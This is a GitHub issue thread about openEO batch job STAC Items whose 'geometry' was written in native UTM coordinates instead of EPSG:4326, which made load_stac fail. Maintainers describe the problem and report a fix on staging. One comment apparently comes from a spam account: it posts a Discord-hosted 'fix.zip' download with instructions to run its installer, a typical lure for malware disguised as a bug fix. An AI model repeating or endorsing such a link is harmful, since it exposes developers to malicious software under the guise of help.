### ISSUE TITLE
"geometry" of STAC Item for GeoTiff job result is not in EPSG:4326

### ISSUE THREAD

**Issue by bossie** [Open-EO/openeo-geopyspark-driver#854]
An oversight perhaps? In this case it prevents the STAC Item from being `load_stac`'ed:

> OpenEO batch job failed: java.lang.IllegalArgumentException: Geometry or Bounding box provided by the catalog has to be in EPSG:4326, but got Extent(581900.0, 9559080.0, 592140.0, 9569320.0) for catalog entry Feature(openEO.tif,Extent(39.737687843764, -3.988745051782351, 39.83000704287855, -3.896026580585802),2019-01-01T00:00Z,[Lorg.openeo.opensearch.OpenSearchResponses$Link;@318d04c6,Some(10.0),None,Some(POLYGON ((581900 9559080, 581900 9569320, 592140 9569320, 592140 9559080, 581900 9559080))),Some(EPSG:32737),GeneralProperties(None,None,None,None,None),Some(Extent(581900.0, 9559080.0, 592140.0, 9569320.0)),None)

Original job with GTiff output: `j-240902a1f7054c21950f4e96a0d8d7a8`
load_stac job that failed: `j-240903da85a64bcbb1f061c1270b1509`

`"geometry"` should be in EPSG:4326 but is in native CRS instead:
```json
{
  "coordinates": [
    [
      [
        581900,
        9559080
      ],
      [
        581900,
        9569320
      ],
      [
        592140,
        9569320
      ],
      [
        592140,
        9559080
      ],
      [
        581900,
        9559080
      ]
    ]
  ],
  "type": "Polygon"
}
```

`"bbox"` is fine however:
```json
[
  39.737687843764,
  -3.988745051782351,
  39.83000704287855,
  -3.896026580585802
]
```

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by bossie** [comment]
Requires a merge of the PR in this repo.

**Comment by bossie** [comment]
Available on staging.

Original job with GTiff output has a valid `"geometry"`: `j-2409054165ac4b089a2734bde280f956`.
That made it `load_stac`'able: `j-2409054b31de40b3a9d662779362426b`
